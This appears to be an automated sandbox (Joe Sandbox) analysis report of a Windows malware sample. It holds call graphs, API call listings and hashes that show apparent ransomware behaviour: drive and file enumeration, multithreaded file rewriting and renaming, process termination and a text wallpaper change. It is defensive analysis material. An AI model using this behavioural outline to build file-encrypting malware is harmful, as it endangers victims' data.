RtlFreeHeap 4274->4280 4275->4273 4276 d96263 FindFirstFileW 4276->4280 4277 d9637e FindClose 4277->4280 4278 d96366 FindNextFileW 4278->4277 4278->4280 4279 d9649f 3 API calls 4279->4280 4280->4273 4280->4274 4280->4276 4280->4277 4280->4278 4280->4279 4283 d92650 5 API calls 4280->4283 4287 d92634 7 API calls 4280->4287 4305 d934bf 4280->4305 4309 d934f6 4280->4309 4312 d92dbc 4280->4312 4283->4280 4287->4280 4289 d92662 4288->4289 4290 d93b35 3 API calls 4289->4290 4291 d92675 4290->4291 4292 d92690 GetFileAttributesW 4291->4292 4294 d926a8 4291->4294 4293 d93b82 RtlFreeHeap 4292->4293 4293->4294 4294->4269 4296 d93b35 3 API calls 4295->4296 4297 d964aa 4296->4297 4298 d950ce 3 API calls 4297->4298 4299 d961e8 4297->4299 4298->4299 4300 d92634 4299->4300 4321 d93433 4300->4321 4306 d934ea 4305->4306 4307 d934c8 4305->4307 4306->4280 4307->4306 4346 d93566 4307->4346 4349 d92e6d GetSystemInfo CreateFileW 4309->4349 4311 d93507 4311->4280 4363 d927cb 4312->4363 4316 d92de9 4317 d92df1 4316->4317 4388 d960c8 PostQueuedCompletionStatus 4316->4388 4320 d92df7 4317->4320 4382 d927a1 4317->4382 4320->4280 4322 d93440 4321->4322 4323 d93b35 3 API calls 4322->4323 4324 d93453 4323->4324 4329 d9263f 4324->4329 4343 d963b4 CreateFileW 4324->4343 4326 d93482 4327 d93b82 RtlFreeHeap 4326->4327 4328 d9348a 4327->4328 4328->4329 4344 d963da WriteFile 4328->4344 4333 d933c4 4329->4333 4331 d934ad 4332 d93cce FindCloseChangeNotification 4331->4332 4332->4329 4334 d933d0 4333->4334 4335 d93b35 3 API calls 4334->4335 4337 d933e3 4335->4337 4336 d92647 4336->4280 4337->4336 4345 d963b4 CreateFileW 4337->4345 4339 d93412 4340 d93b82 RtlFreeHeap 4339->4340 4341 d9341a 4340->4341 4341->4336 4342 d93cce FindCloseChangeNotification 4341->4342 4342->4336 4343->4326 4344->4331 4345->4339 4347 d961ad 35 API calls 4346->4347 4348 d935ab 4347->4348 4348->4306 4350 d92eab CreateFileMappingW 4349->4350 4351 d92f55 4349->4351 4352 d92f62 4350->4352 4359 d92ece 4350->4359 4351->4352 4355 d93cce FindCloseChangeNotification 4351->4355 4354 d92f71 DeleteFileW 4352->4354 4356 d93cce FindCloseChangeNotification 4352->4356 4353 d92f45 4353->4351 4357 d92f4c UnmapViewOfFile 4353->4357 4354->4311 4355->4352 4360 d92f70 4356->4360 4357->4351 4358 d92eef MapViewOfFile 4358->4351 4362 d92f0e 4358->4362 4359->4353 4359->4358 4360->4354 4361 d92f18 UnmapViewOfFile 4361->4359 4361->4362 4362->4353 4362->4359 4362->4361 4364 d927dd 4363->4364 4389 d96083 4364->4389 4366 d927f7 4367 d927fb RtlGetLastWin32Error 4366->4367 4370 d92822 4366->4370 4376 d92805 4367->4376 4379 d92834 4367->4379 4371 d92838 RtlGetLastWin32Error 4370->4371 4372 d9288c 4370->4372 4378 d9284f GetFileAttributesW 4370->4378 4380 d9285f SetFileAttributesW 4370->4380 4392 d960fe CreateFileW 4370->4392 4371->4370 4374 d9289c 4371->4374 4402 d928a8 4372->4402 4373 d96083 RtlAllocateHeap 4373->4376 4398 d96097 4374->4398 4376->4366 4376->4373 4401 d9486b Sleep 4376->4401 4378->4370 4378->4374 4379->4320 4381 d95f4e CreateIoCompletionPort 4379->4381 4380->4370 4380->4374 4381->4316 4383 d927b6 4382->4383 4408 d960e2 4383->4408 4386 d96097 RtlFreeHeap 4387 d927c5 4386->4387 4387->4320 4388->4317 4390 d93ad7 RtlAllocateHeap 4389->4390 4391 d96093 4390->4391 4391->4366 4393 d96132 4392->4393 4397 d9612e 4392->4397 4394 d950ce 3 API calls 4393->4394 4395 d9613a 4394->4395 4396 d93cce FindCloseChangeNotification 4395->4396 4395->4397 4396->4397 4397->4370 4407 d93b1f RtlFreeHeap 4398->4407 4400 d960a7 4400->4379 4401->4376 4403 d95639 9 API calls 4402->4403 4404 d928e1 4403->4404 4405 d9580c 9 API calls 4404->4405 4406 d92931 4405->4406 4406->4379 4407->4400 4409 d93cce FindCloseChangeNotification 4408->4409 4410 d960f1 4409->4410 4411 d93b82 RtlFreeHeap 4410->4411 4412 d927bc 4411->4412 4412->4386 4414 d93b35 3 API calls 4413->4414 4415 d96442 4414->4415 4416 d961ad 35 API calls 4415->4416 4419 d96497 4415->4419 4417 d96491 4416->4417 4418 d93b82 RtlFreeHeap 4417->4418 4418->4419 4419->4266 4447 d93af4 HeapCreate 4420->4447 4422 d9602e 4423 d9603c CreateIoCompletionPort 4422->4423 4429 d92ae6 4422->4429 4424 d9605c 4423->4424 4425 d96052 4423->4425 4448 d95fd2 4424->4448 4455 d93b11 HeapDestroy 4425->4455 4429->3864 4429->3865 4431 d96072 4432 d93cce FindCloseChangeNotification 4431->4432 4432->4429 4526 d9454b GetSystemInfo 4433->4526 4435 d95f8b 4436 d95f95 PostQueuedCompletionStatus 4435->4436 4437 d95fad 4435->4437 4528 d9454b GetSystemInfo 4436->4528 4439 d95fbc 4437->4439 4440 d95faf 4437->4440 4527 d93b11 HeapDestroy 4439->4527 4440->4437 4529 d9486b Sleep 4440->4529 4443 d95fc3 4444 d93cce FindCloseChangeNotification 4443->4444 4445 d95fcb 4444->4445 4445->3864 4446->3870 4447->4422 4457 d9454b GetSystemInfo 4448->4457 4450 d95fee CreateThread 4451 d96016 4450->4451 4454 d95fe7 4450->4454 4459 d92b85 4450->4459 4451->4429 4456 d93b11 HeapDestroy 4451->4456 4452 d93cce FindCloseChangeNotification 4452->4454 4454->4450 4454->4451 4454->4452 4458 d9454b GetSystemInfo 4454->4458 4455->4429 4456->4431 4457->4454 4458->4454 4460 d942de 11 API calls 4459->4460 4468 d92b91 4460->4468 4462 d92c39 4463 d94386 6 API calls 4462->4463 4465 d92c42 4463->4465 4464 d92c00 RtlGetLastWin32Error 4464->4468 4468->4462 4468->4464 4472 d92963 4468->4472 4483 d92cb8 4468->4483 4492 d92c4b 4468->4492 4501 d92a49 4468->4501 4511 d960ab GetQueuedCompletionStatus 4468->4511 4512 d9277f 4468->4512 4473 d93cce FindCloseChangeNotification 4472->4473 4474 d92977 4473->4474 4475 d93b35 3 API calls 4474->4475 4476 d92990 4475->4476 4477 d929c1 4476->4477 4515 d964e5 MoveFileW 4476->4515 4477->4477 4480 d927a1 2 API calls 4477->4480 4479 d929b9 4482 d93b82 RtlFreeHeap 4479->4482 4481 d92a40 4480->4481 4481->4468 4482->4477 4484 d92cd3 4483->4484 4516 d96193 WriteFile 4484->4516 4486 d92d08 4487 d92d0d RtlGetLastWin32Error 4486->4487 4488 d92d2f 4486->4488 4487->4488 4491 d92d19 4487->4491 4488->4468 4491->4486 4517 d9486b Sleep 4491->4517 4518 d96193 WriteFile 4491->4518 4493 d92c6a 4492->4493 4519 d96193 WriteFile 4493->4519 4495 d92c8b 4496 d92c90 RtlGetLastWin32Error 4495->4496 4497 d92cb4 4495->4497 4496->4497 4500 d92c9c 4496->4500 4497->4468 4500->4495 4520 d9486b Sleep 4500->4520 4521 d96193 WriteFile 4500->4521 4522 d9615f ReadFile 4501->4522 4503 d92a6d 4504 d92a72 RtlGetLastWin32Error 4503->4504 4505 d92a9e 4503->4505 4506 d92aa0 4503->4506 4507 d92a83 4503->4507 4504->4503 4504->4505 4505->4468 4509 d9277f PostQueuedCompletionStatus 4506->4509 4507->4503 4523 d9486b Sleep 4507->4523 4524 d9615f ReadFile 4507->4524 4509->4505 4511->4468 4525 d960c8 PostQueuedCompletionStatus 4512->4525 4514 d9279c 4514->4468 4515->4479 4516->4486 4517->4491 4518->4491 4519->4495 4520->4500 4521->4500 4522->4503 4523->4507 4524->4507 4525->4514 4526->4435 4527->4443 4528->4435 4529->4440 4531 d94626 9 API calls 4530->4531 4532 d937d2 4531->4532 4533 d93873 4532->4533 4534 d93b35 3 API calls 4532->4534 4533->3884 4535 d937ec 4534->4535 4535->4533 4536 d93838 4535->4536 4537 d94626 9 API calls 4535->4537 4564 d948b8 GetTempPathW 4536->4564 4537->4535 4539 d93867 4540 d9386d 4539->4540 4542 d93875 4539->4542 4541 d93b82 RtlFreeHeap 4540->4541 4541->4533 4543 d93b35 3 API calls 4542->4543 4544 d93892 4543->4544 4544->4533 4545 d93b82 RtlFreeHeap 4544->4545 4546 d938a1 4545->4546 4547 d93b82 RtlFreeHeap 4546->4547 4547->4533 4549 d9362d LocalAlloc 4548->4549 4561 d937ab SystemParametersInfoW 4548->4561 4551 d936ad 4549->4551 4552 d936b4 GlobalAlloc 4549->4552 4551->4552 4553 d936ea GetDIBits 4552->4553 4552->4561 4554 d93707 CreateFileW 4553->4554 4553->4561 4555 d9372a WriteFile 4554->4555 4554->4561 4556 d9378d 4555->4556 4557 d93770 WriteFile 4555->4557 4560 d93cce FindCloseChangeNotification 4556->4560 4557->4556 4558 d93790 WriteFile 4557->4558 4558->4556 4559 d937ae 4558->4559 4562 d93cce FindCloseChangeNotification 4559->4562 4560->4561 4561->3889 4563 d937b3 GlobalFree 4562->4563 4563->4561 4565 d948c9 4564->4565 4566 d948cb 4564->4566 4565->4539 4567 d93b35 3 API calls 4566->4567 4568 d948d5 4567->4568 4569 d948dc GetTempPathW 4568->4569 4572 d948ee 4568->4572 4570 d948e8 4569->4570 4569->4572 4571 d93b82 RtlFreeHeap 4570->4571 4571->4572 4572->4539 4574 d91cab 21 API calls 4573->4574 4575 d925ef 4574->4575 4582 d9262d 4575->4582 4584 d92f83 4575->4584 4577 d925ff 4578 d92620 4577->4578 4598 d9673a 4577->4598 4580 d93b82 RtlFreeHeap 4578->4580 4578->4582 4580->4582 4582->3897 4583 d93b82 RtlFreeHeap 4583->4578 4585 d92f95 4584->4585 4586 d93b35 3 API calls 4585->4586 4588 d92fa2 4586->4588 4587 d933b0 4587->4577 4588->4587 4589 d94626 9 API calls 4588->4589 4590 d9314b 4589->4590 4591 d94626 9 API calls 4590->4591 4592 d932d7 4591->4592 4593 d94626 9 API calls 4592->4593 4594 d932f9 4593->4594 4595 d9333c 4594->4595 4596 d94626 9 API calls 4594->4596 4597 d94626 9 API calls 4595->4597 4596->4594 4597->4587 4601 d96762 4598->4601 4599 d92618 4599->4583 4600 d968bb RtlGetLastWin32Error 4600->4601 4601->4599 4601->4600 4602 d968e9 4601->4602 4602->4599 4604 d96653 4602->4604 4606 d9666f 4604->4606 4605 d966cc 4608 d96725 4605->4608 4609 d93b35 3 API calls 4605->4609 4606->4605 4607 d93b35 3 API calls 4606->4607 4606->4608 4610 d93b82 RtlFreeHeap 4606->4610 4607->4606 4608->4599 4611 d966fd 4609->4611 4610->4606 4611->4608 4612 d93b82 RtlFreeHeap 4611->4612 4612->4608 4614 d93c83 GetKeyboardLayoutList 4613->4614 4614->3902 4614->3903 4616 d9532b 4615->4616 4623 d952e5 4615->4623 4625 d93b1f RtlFreeHeap 4616->4625 4618 d95336 4626 d93b11 HeapDestroy 4618->4626 4620 d9533d 4620->3911 4621 d93b82 RtlFreeHeap 4621->4623 4623->4616 4623->4621 4624 d93b1f RtlFreeHeap 4623->4624 4624->4623 4625->4618 4626->4620 4684 d92e1f 4685 d92e2a 4684->4685 4686 d92e2e 4684->4686 4686->4685 4688 d96406 PathFindExtensionW 4686->4688 4689 d9641b 4688->4689 4689->4685 4690 d95e91 4691 d95eae 4690->4691 4692 d95ce9 9 API calls 4691->4692 4693 d95ec3 4692->4693 4697 d91071 4698 d94bc4 6 API calls 4697->4698 4699 d91080 4698->4699 4700 d910a0 4699->4700 4704 d94c16 CryptStringToBinaryW 4699->4704 4703 d93b82 RtlFreeHeap 4703->4700 4705 d94c39 4704->4705 4709 d91095 4704->4709 4706 d93b35 3 API calls 4705->4706 4707 d94c42 4706->4707 4708 d94c49 CryptStringToBinaryW 4707->4708 4707->4709 4708->4709 4710 d94c67 4708->4710 4709->4703 4711 d93b82 RtlFreeHeap 4710->4711 4711->4709 4712 d95c31 4715 d95c6e 4712->4715 4718 d941fc GetPEB 4715->4718 4717 d95c3b 4718->4717 4719 d92590 4720 d925a0 4719->4720 4721 d925b2 OpenProcess 4720->4721 4724 d925d4 4720->4724 4722 d925c5 TerminateProcess 4721->4722 4721->4724 4723 d93cce FindCloseChangeNotification 4722->4723 4723->4724 4725 d95bed 4726 d95c6e GetPEB 4725->4726 4727 d95bf7 4726->4727 4728 d9102c 4729 d94bc4 6 API calls 4728->4729 4730 d9103a 4729->4730 4731 d94480 GetNativeSystemInfo 4735 d91142 4736 d94bc4 6 API calls 4735->4736 4737 d91151 4736->4737 4738 d94c16 6 API calls 4737->4738 4741 d91178 4737->4741 4739 d91169 4738->4739 4740 d93b82 RtlFreeHeap 4739->4740 4742 d91171 4740->4742 4742->4741 4743 d93b82 RtlFreeHeap 4742->4743 4743->4741 4627 d95ae4 4628 d95aed 4627->4628 4630 d95b0a 4628->4630 4633 d95ce9 4628->4633 4645 d95c3d 4630->4645 4634 d95d15 4633->4634 4640 d95c3d 9 API calls 4634->4640 4649 d95eca 4634->4649 4653 d95b7b 4634->4653 4657 d95e58 4634->4657 4661 d95bf9 4634->4661 4665 d95bb4 4634->4665 4669 d95b42 4634->4669 4673 d95e22 4634->4673 4677 d95f00 4634->4677 4635 d95db1 4635->4628 4640->4635 4646 d95c5a 4645->4646 4681 d95f39 4646->4681 4648 d95b31 GetProcAddress 4650 d95ee4 4649->4650 4651 d95ce9 8 API calls 4650->4651 4652 d95ef9 LoadLibraryA 4651->4652 4652->4635 4654 d95b98 4653->4654 4655 d95ce9 8 API calls 4654->4655 4656 d95bad LoadLibraryA 4655->4656 4656->4635 4658 d95e75 4657->4658 4659 d95ce9 8 API calls 4658->4659 4660 d95e8a LoadLibraryA 4659->4660 4660->4635 4662 d95c15 4661->4662 4663 d95ce9 8 API calls 4662->4663 4664 d95c2a LoadLibraryA 4663->4664 4664->4635 4666 d95bd1 4665->4666 4667 d95ce9 8 API calls 4666->4667 4668 d95be6 LoadLibraryA 4667->4668 4668->4635 4670 d95b5f 4669->4670 4671 d95ce9 8 API calls 4670->4671 4672 d95b74 LoadLibraryA 4671->4672 4672->4635 4674 d95e3c 4673->4674 4675 d95ce9 8 API calls 4674->4675 4676 d95e51 LoadLibraryA 4675->4676 4676->4635 4678 d95f1d 4677->4678 4679 d95ce9 8 API calls 4678->4679 4680 d95f32 LoadLibraryA 4679->4680 4680->4635 4682 d95ce9 8 API calls 4681->4682 4683 d95f49 LoadLibraryA 4682->4683 4683->4648 4744 d910c4 4745 d94bc4 6 API calls 4744->4745 4746 d910d3 4745->4746 4747 d910f3 4746->4747 4748 d94c16 6 API calls 4746->4748 4749 d910e8 4748->4749 4750 d93b82 RtlFreeHeap 4749->4750 4750->4747

                              Control-flow Graph

                              APIs
                              • GetDC.USER32(00000000), ref: 00D938D0
                              • CreateCompatibleDC.GDI32(00000000), ref: 00D938E5
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00D938FC
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00D9390F
                              • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00D9391B
                              • SelectObject.GDI32(00000000,00000000), ref: 00D9392E
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D93937
                              • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 00D93942
                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00D9395F
                              • SelectObject.GDI32(00000000,00000000), ref: 00D93972
                              • SetBkMode.GDI32(00000000,00000001), ref: 00D9397B
                              • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00D93987
                              • GetStockObject.GDI32(00000002), ref: 00D9398F
                              • FillRect.USER32(00000000,00000000,00000000), ref: 00D939AC
                              • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 00D93A2E
                              • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 00D93A7C
                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00D93AA1
                              • DeleteObject.GDI32(?), ref: 00D93AB1
                              • DeleteObject.GDI32(?), ref: 00D93ABA
                              • DeleteDC.GDI32(00000000), ref: 00D93AC1
                              • ReleaseDC.USER32(00000000,00000000), ref: 00D93ACB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapColorDrawFillFontInfoModeParametersPixelRectReleaseStockSystem
                              • String ID:
                              • API String ID: 830383330-0
                              • Opcode ID: 5c1a4404dddc6a2292e74ce8bbf9c25c4c76332b886fae46bd6c5ba0d5cd95a4
                              • Instruction ID: 587c167f657afceba224aec0ca7dc87979d7b2ef2eecb50b118f0e9a32213e12
                              • Opcode Fuzzy Hash: 5c1a4404dddc6a2292e74ce8bbf9c25c4c76332b886fae46bd6c5ba0d5cd95a4
                              • Instruction Fuzzy Hash: 435193B1A10319BFDB04DBA5DD4AFBE7BB9EF49721F144115F511E62D0DA709A008B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 58 d92e6d-d92ea5 GetSystemInfo CreateFileW 59 d92eab-d92ec8 CreateFileMappingW 58->59 60 d92f55 58->60 62 d92ece-d92ed3 59->62 63 d92f63-d92f68 59->63 61 d92f58-d92f5a 60->61 61->63 64 d92f5c-d92f62 call d93cce 61->64 65 d92f45-d92f4a 62->65 66 d92ed5-d92ed8 62->66 67 d92f6a-d92f70 call d93cce 63->67 68 d92f71-d92f82 DeleteFileW 63->68 64->63 65->61 73 d92f4c-d92f53 UnmapViewOfFile 65->73 70 d92eda-d92ee2 66->70 71 d92f41-d92f43 66->71 67->68 75 d92eef-d92f0c MapViewOfFile 70->75 76 d92ee4 70->76 71->65 71->70 73->61 75->61 80 d92f0e-d92f3d call d93bbc UnmapViewOfFile 75->80 78 d92eea-d92eec 76->78 79 d92ee6-d92ee8 76->79 78->75 79->75 79->78 80->70 83 d92f3f 80->83 83->65 83->71
                              APIs
                              • GetSystemInfo.KERNEL32(?), ref: 00D92E84
                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 00D92E99
                              • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00D92EBE
                              • MapViewOfFile.KERNEL32(00000000,000F001F,?,?,?), ref: 00D92F02
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00D92F1C
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00D92F4D
                              • DeleteFileW.KERNEL32(?), ref: 00D92F74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$View$CreateUnmap$DeleteInfoMappingSystem
                              • String ID:
                              • API String ID: 2330190760-0
                              • Opcode ID: 56035679c8b9ae2562655370e8a5bbe04e2d24a8bdcc87e80f0b30c94008212a
                              • Instruction ID: f4ee6b2bb1c65c307a5426a4cb6944aa69b2478003c29cec5b2fbe0ba41b3fb8
                              • Opcode Fuzzy Hash: 56035679c8b9ae2562655370e8a5bbe04e2d24a8bdcc87e80f0b30c94008212a
                              • Instruction Fuzzy Hash: 9A316131A00219BBCF14DFA9DC899BFBBB9EF49720F144119F919E2251DA709A408BB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 201 d94a6c-d94a7b timeBeginPeriod timeGetTime 202 d94a7d-d94a8d Sleep timeGetTime 201->202 202->202 203 d94a8f-d94a90 202->203
                              APIs
                              • timeBeginPeriod.WINMM(00000001,?,00D949D8,00000000,00000000,00000000,?,00000030,00000000,?,?,00D9569B,?,00000020,00000000), ref: 00D94A6F
                              • timeGetTime.WINMM(?,00D9569B,?,00000020,00000000,?,00D95644,?,?,00D923A2,?,00DAD660), ref: 00D94A75
                              • Sleep.KERNEL32(00000001,?,00D9569B,?,00000020,00000000,?,00D95644,?,?,00D923A2,?,00DAD660), ref: 00D94A7F
                              • timeGetTime.WINMM(?,00D9569B,?,00000020,00000000,?,00D95644,?,?,00D923A2,?,00DAD660), ref: 00D94A85
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: time$Time$BeginPeriodSleep
                              • String ID:
                              • API String ID: 4118631919-0
                              • Opcode ID: 2ecc507ec011b56734bbf7d0c2a46d1ae4a45ef709bc2ba517b1778732c9f1b0
                              • Instruction ID: a2f97956bb40ec2554d6be2c3f2e3cf9969279d8fd61dae4f2d200456caedae9
                              • Opcode Fuzzy Hash: 2ecc507ec011b56734bbf7d0c2a46d1ae4a45ef709bc2ba517b1778732c9f1b0
                              • Instruction Fuzzy Hash: D5C0E9315602105BD7206774FD0EA993AA19B06775F051150E519D56A1DF534C818AB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 204 d93e53-d93e67 205 d93e68-d93e6a 204->205 206 d93e6c-d93e6e 205->206 207 d93e92-d93ea6 205->207 208 d93f22-d93f25 206->208 209 d93e74-d93e85 call d93b35 206->209 210 d93ea8-d93eae 207->210 211 d93f14-d93f1b 207->211 212 d93f28-d93f30 208->212 209->208 218 d93e8b-d93e90 209->218 215 d93eb0-d93ec6 GetDriveTypeW call d963f3 210->215 211->212 213 d93f1d 211->213 213->205 220 d93ec8-d93eca 215->220 221 d93f00-d93f10 215->221 218->207 223 d93efc-d93efd 220->223 224 d93ecc-d93eef GetDiskFreeSpaceExW 220->224 221->215 222 d93f12-d93f13 221->222 222->211 223->221 224->223 225 d93ef1-d93ef9 224->225 225->223
                              APIs
                              • GetDriveTypeW.KERNEL32(?,00000001,00000000,00DAC040,?,?,?,?,00D9196B,?), ref: 00D93EB4
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,00000006,0000000E,?,?,?,?,00D9196B,?), ref: 00D93EE7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DiskDriveFreeSpaceType
                              • String ID: A:\
                              • API String ID: 1419299958-3379428675
                              • Opcode ID: 411a0aa056dfb1cd1b72f62b59faf3e7d15330ccd45d63387cbd4fd1d80475bd
                              • Instruction ID: 70b9f2cbe1aeca70cde9f9a24510020e5b00dd7976f8942f6833e8989ac23ef1
                              • Opcode Fuzzy Hash: 411a0aa056dfb1cd1b72f62b59faf3e7d15330ccd45d63387cbd4fd1d80475bd
                              • Instruction Fuzzy Hash: 0F216276E0031AABDB14DFA9D844AAFF7B8FF85710F14862AE904D7200D7309A418BB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 d961ad-d961d8 call d92650 235 d9638a-d9638d 233->235 236 d961de-d961ed call d9649f call d92634 233->236 237 d961fe-d96204 235->237 238 d96393 235->238 248 d961f0-d961f9 236->248 242 d96245-d96247 237->242 243 d96206-d9621e call d95073 call d93b82 * 2 237->243 241 d963a9-d963ab 238->241 245 d963ad-d963b3 241->245 246 d96395-d963a8 call d93b82 * 2 241->246 242->241 247 d9624d-d96279 call d9511c call d94faf FindFirstFileW 242->247 263 d96223-d9623a 243->263 246->241 247->235 262 d9627f-d96294 call d95012 247->262 253 d96387 248->253 253->235 268 d9629a-d962af call d95012 262->268 269 d96361-d96364 262->269 265 d9623c 263->265 266 d9623f-d96244 263->266 265->266 266->242 268->269 274 d962b5-d962bf 268->274 271 d9637e-d96381 FindClose 269->271 272 d96366-d96378 FindNextFileW 269->272 271->253 272->262 272->271 274->269 275 d962c5-d962e1 call d95073 274->275 278 d96323-d96344 275->278 279 d962e3-d962f5 call d94faf 275->279 278->269 283 d96346-d96352 278->283 291 d962f6 call d934bf 279->291 292 d962f6 call d92650 279->292 293 d96355 call d92dbc 283->293 294 d96355 call d934f6 283->294 284 d962f9-d962fe 284->269 285 d96300-d96315 call d9649f call d92634 284->285 289 d96318-d96321 285->289 286 d96358-d9635e 286->269 289->269 291->284 292->284 293->286 294->286
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7333946a4670f34952890ea2fac78fc58d2d88ff1e5feeb1270c4139dc0cf5a0
                              • Instruction ID: 1b5557884a8e02089959629a9e14ca50275ddd336f8a2091683ab4761411f0aa
                              • Opcode Fuzzy Hash: 7333946a4670f34952890ea2fac78fc58d2d88ff1e5feeb1270c4139dc0cf5a0
                              • Instruction Fuzzy Hash: F8515F7190061AAFDF10AF65CC45AAEB7B8FF05324F584166F908E6141EB35EA50CBB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 297 d9457f-d9459a CreateToolhelp32Snapshot 298 d9459c-d9459e 297->298 299 d945a0-d945b8 Process32FirstW 297->299 300 d945f0-d945f5 298->300 301 d945e3-d945e5 299->301 302 d945ba-d945cd 301->302 303 d945e7-d945e8 call d93cce 301->303 307 d945cf-d945d3 302->307 308 d945d5-d945dd Process32NextW 302->308 306 d945ed-d945ee 303->306 306->300 307->303 307->308 308->301
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D9458F
                              • Process32FirstW.KERNEL32(00000000,?), ref: 00D945B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
